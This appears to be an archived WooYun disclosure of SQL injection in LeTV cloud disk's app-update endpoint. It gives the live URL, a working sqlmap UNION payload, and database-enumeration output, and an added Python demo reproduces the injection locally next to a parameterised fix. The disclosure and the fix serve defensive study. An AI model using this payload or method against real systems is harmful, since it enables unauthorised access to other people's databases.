WooYun (WooYun.org) historical vulnerability archive --- http://wy.zone.ci/
WooYun Drops articles online --- http://drop.zone.ci/
2014-05-03: Details reported to the vendor, awaiting vendor response
2014-05-03: Vendor confirmed the issue; details visible to the vendor only
2014-05-13: Details disclosed to core white hats and relevant domain experts
2014-05-23: Details disclosed to regular white hats
2014-06-02: Details disclosed to intern white hats
2014-06-17: Details disclosed to the public
SQL injection
LeTV cloud disk (乐视云盘) app:
http://cloud.letv.com/ledisk//appupdate/index?version_code=1003&channel=wandoujia
The version_code parameter of the app-update check is injectable: the value is placed into the back-end SQL query unfiltered, and sqlmap confirms a UNION-based injection against a MySQL back end.
Place: GET
Parameter: version_code
Type: UNION query
Title: MySQL UNION query (NULL) - 9 columns
Payload: version_code=1003 UNION ALL SELECT NULL,CONCAT(0x71756b7171,0x52655371416d78426d68,0x716c6e6971),NULL,NULL,NULL,NULL,NULL,NULL,NULL#&channel=wandoujia
---
[22:19:38] [INFO] testing MySQL
[22:19:38] [INFO] confirming MySQL
[22:19:38] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:19:38] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\cloud.letv.com'
[*] shutting down at 22:19:38
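The following is an added example, not code from the report or from the vendor, that reproduces the mechanics of the sqlmap finding above on a local stand-in. The real query behind /ledisk/appupdate/index is not shown in the report, so the table (nine columns, matching the nine NULLs sqlmap needed to make its UNION line up), the sample rows and the column names are constructed assumptions. SQLite is used in place of MySQL, so the report's payload is adapted in two places: CONCAT(0x..,0x..,0x..) becomes '..'||'..'||'..' and the trailing # comment becomes --. The three hex constants are decoded to show what they are: the random marker strings sqlmap brackets its result with so it can find the value in the HTTP response. A hardened version of the same lookup, with a type check and bound parameters, is shown beside the vulnerable one.

```python
import re
import sqlite3

# Constructed stand-in schema and data (assumption: the real ledisk table and
# query are not known from the report). 9 columns, like the 9-column UNION.
SCHEMA = """
CREATE TABLE app_update (
    id INTEGER PRIMARY KEY,
    version_code INTEGER NOT NULL,
    channel TEXT NOT NULL,
    version_name TEXT,
    apk_url TEXT,
    md5 TEXT,
    size INTEGER,
    changelog TEXT,
    force_update INTEGER
);
INSERT INTO app_update VALUES
    (1, 1003, 'wandoujia', '1.0.3', 'https://example.invalid/app-1003.apk', 'd41d8cd9', 4096, 'bugfixes', 0),
    (2, 1004, 'wandoujia', '1.0.4', 'https://example.invalid/app-1004.apk', 'e1f2a3b4', 5120, 'new features', 1);
"""

COLUMNS = "id, version_code, channel, version_name, apk_url, md5, size, changelog, force_update"

# The three hex literals from the report's CONCAT(...), decoded. sqlmap wraps a
# random string (the middle one) in a random prefix and suffix so it can locate
# the injected value in the page body.
MARKER_HEX = ("71756b7171", "52655371416d78426d68", "716c6e6971")
MARKERS = tuple(bytes.fromhex(h).decode("ascii") for h in MARKER_HEX)

# The report's payload adapted to SQLite: '||' instead of CONCAT(), '--' instead
# of '#'. The leading 1003 and the 9-column UNION ALL SELECT are unchanged.
PAYLOAD = ("1003 UNION ALL SELECT NULL,'%s'||'%s'||'%s',NULL,NULL,NULL,NULL,NULL,NULL,NULL --"
           % MARKERS)


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_update_vulnerable(conn, version_code, channel):
    """Builds the WHERE clause by string formatting: version_code lands in the SQL text
    verbatim, so a UNION in it is executed and the comment swallows the channel check."""
    sql = ("SELECT %s FROM app_update WHERE version_code=%s AND channel='%s'"
           % (COLUMNS, version_code, channel))
    return conn.execute(sql).fetchall()


def lookup_update_safe(conn, version_code, channel):
    """Rejects anything that is not a plain integer, then binds both values as parameters."""
    if not re.fullmatch(r"[0-9]{1,10}", version_code):
        raise ValueError("version_code must be a decimal integer")
    sql = "SELECT %s FROM app_update WHERE version_code=? AND channel=?" % COLUMNS
    return conn.execute(sql, (int(version_code), channel)).fetchall()


def injected_value(rows):
    """What sqlmap does with the response: find prefix...suffix and return what is between."""
    prefix, _, suffix = MARKERS
    for row in rows:
        for cell in row:
            if isinstance(cell, str) and cell.startswith(prefix) and cell.endswith(suffix):
                return cell[len(prefix):-len(suffix)]
    return None


def demo():
    conn = open_db()
    result = {
        "normal": lookup_update_vulnerable(conn, "1003", "wandoujia"),
        "injected": lookup_update_vulnerable(conn, PAYLOAD, "wandoujia"),
    }
    result["leaked"] = injected_value(result["injected"])
    try:
        lookup_update_safe(conn, PAYLOAD, "wandoujia")
        result["safe_rejected"] = False
    except ValueError:
        result["safe_rejected"] = True
    result["safe_normal"] = lookup_update_safe(conn, "1003", "wandoujia")
    return result


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "=>", value)
```

Running it shows the vulnerable lookup returning the legitimate row plus a second, attacker-controlled row carrying the marker string, which is exactly the signal sqlmap keys on; replacing the marker column with a real expression such as a schema or column name is how the database and table listings further down were obtained. The safe version refuses the payload before any SQL is built, and because both values are bound rather than interpolated, even a version_code that passed a weaker check could not change the query's structure.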
---
[22:30:44] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL 5
[22:30:44] [INFO] fetching database names
[22:30:45] [INFO] the SQL query used returns 2 entries
[22:30:45] [INFO] retrieved: "information_schema"
[22:30:45] [INFO] retrieved: "ledisk"
available databases [2]:
[*] information_schema
[*] ledisk
[22:30:45] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\output\cloud.letv.com'
[*] shutting down at 22:30:45
Database: information_schema
[65 tables]
CHARACTER_SETS
CLIENT_STATISTICS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_TEMPORARY_TABLES
GLOBAL_VARIABLES
INDEX_STATISTICS
INNODB_BUFFER_PAGE
INNODB_BUFFER_PAGE_LRU
INNODB_BUFFER_POOL_PAGES
INNODB_BUFFER_POOL_PAGES_BLOB
INNODB_BUFFER_POOL_PAGES_INDEX
INNODB_BUFFER_POOL_STATS
INNODB_CHANGED_PAGES
INNODB_CMP
INNODB_CMPMEM
INNODB_CMPMEM_RESET
INNODB_CMP_RESET
INNODB_INDEX_STATS
INNODB_LOCKS
INNODB_LOCK_WAITS
INNODB_RSEG
INNODB_SYS_COLUMNS
INNODB_SYS_FIELDS
INNODB_SYS_FOREIGN
INNODB_SYS_FOREIGN_COLS
INNODB_SYS_INDEXES
INNODB_SYS_STATS
INNODB_SYS_TABLES
INNODB_SYS_TABLESTATS
INNODB_TABLE_STATS
INNODB_TRX
INNODB_UNDO_LOGS
KEY_COLUMN_USAGE
PARAMETERS
PARTITIONS
PLUGINS
PROCESSLIST
PROFILING
QUERY_RESPONSE_TIME
REFERENTIAL_CONSTRAINTS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
SESSION_STATUS
SESSION_VARIABLES
STATISTICS
TABLES
TABLESPACES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TABLE_STATISTICS
TEMPORARY_TABLES
THREAD_STATISTICS
TRIGGERS
USER_PRIVILEGES
USER_STATISTICS
VIEWS
XTRADB_ADMIN_COMMAND

Note that tables such as CLIENT_STATISTICS, INDEX_STATISTICS, USER_STATISTICS, QUERY_RESPONSE_TIME and XTRADB_ADMIN_COMMAND are not part of stock Oracle MySQL; they come from the Percona Server / XtraDB patch set, which identifies the back-end build more precisely than the "MySQL 5" banner does.
Severity: High
Vulnerability Rank: 18
Confirmed: 2014-05-03 23:15
Thank you for finding this; we will fix it right away.
None